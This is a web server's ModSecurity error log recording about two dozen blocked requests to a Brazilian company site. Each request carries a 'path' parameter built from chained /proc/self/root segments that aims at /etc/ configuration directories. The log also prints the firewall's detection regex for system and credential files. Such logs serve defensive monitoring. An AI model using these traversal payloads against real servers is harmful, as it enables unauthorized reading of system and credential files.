[Mon Mar 16 08:15:01.415064 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.243.203:39100] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmNLABkC4fWIHEf8HPcwAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:15:02.675397 2026] [:error] [pid 21533:tid 140411716749056] [client 74.7.241.46:59552] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmNnjZBu2q05ozVU84_QAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:15:02.871890 2026] [:error] [pid 32654:tid 140411590858496] [client 74.7.243.203:57064] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmNglT9VtDQc7bgUyLrwAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:15:03.963821 2026] [:error] [pid 21806:tid 140411548894976] [client 74.7.241.46:54902] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmN9SswJuvopo3lOhEywAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:15:05.226196 2026] [:error] [pid 10831:tid 140411741927168] [client 74.7.241.46:54904] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmOY6lpbStxTqkSktRbQAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:15:06.363476 2026] [:error] [pid 10772:tid 140411599251200] [client 74.7.243.203:57072] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmOv9ocpUE4ed4uDzSlAAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:15:07.683466 2026] [:error] [pid 10831:tid 140411725141760] [client 74.7.241.46:54908] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmO46lpbStxTqkSktRcAAAAkI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:15:09.721052 2026] [:error] [pid 32654:tid 140411658000128] [client 74.7.243.203:57082] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmPQlT9VtDQc7bgUyLtAAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:15:11.034982 2026] [:error] [pid 32654:tid 140411565680384] [client 74.7.243.203:40690] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmPwlT9VtDQc7bgUyLtgAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:15:11.087255 2026] [:error] [pid 32654:tid 140411616036608] [client 74.7.241.46:53820] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmPwlT9VtDQc7bgUyLtwAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:15:12.167383 2026] [:error] [pid 10709:tid 140411649607424] [client 74.7.243.203:40704] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmQBXjF1vJNtV6CWrenwAAAcs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:15:12.387756 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.241.46:53836] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmQLABkC4fWIHEf8HPdAAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:15:14.498878 2026] [:error] [pid 10709:tid 140411658000128] [client 74.7.243.203:40708] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmQhXjF1vJNtV6CWreoQAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:15:16.648129 2026] [:error] [pid 32654:tid 140411741927168] [client 74.7.241.46:53848] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmRAlT9VtDQc7bgUyLvQAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:15:19.876176 2026] [:error] [pid 21946:tid 140411540502272] [client 74.7.241.46:53864] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmR3bQATo66fKoS7wuOwAAANg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:15:21.221878 2026] [:error] [pid 32654:tid 140411641214720] [client 74.7.241.46:48434] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmSQlT9VtDQc7bgUyLvgAAAQw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:15:27.818065 2026] [:error] [pid 10709:tid 140411607643904] [client 74.7.241.46:48446] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmTxXjF1vJNtV6CWreqAAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:15:29.110925 2026] [:error] [pid 32654:tid 140411674785536] [client 74.7.241.46:48898] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmUQlT9VtDQc7bgUyLwAAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:15:30.283358 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.241.46:48904] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmUrABkC4fWIHEf8HPdQAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:15:31.575544 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.241.46:48908] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmU9SswJuvopo3lOhEzwAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:15:34.667244 2026] [:error] [pid 10651:tid 140411716749056] [client 74.7.243.203:40716] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmVrysWC90G-1nBrAqEAAAAYM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:15:36.886773 2026] [:error] [pid 32654:tid 140411691570944] [client 74.7.241.46:48912] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmWAlT9VtDQc7bgUyLxwAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:15:37.048840 2026] [:error] [pid 10709:tid 140411548894976] [client 74.7.243.203:53608] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmWRXjF1vJNtV6CWreqwAAAdc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
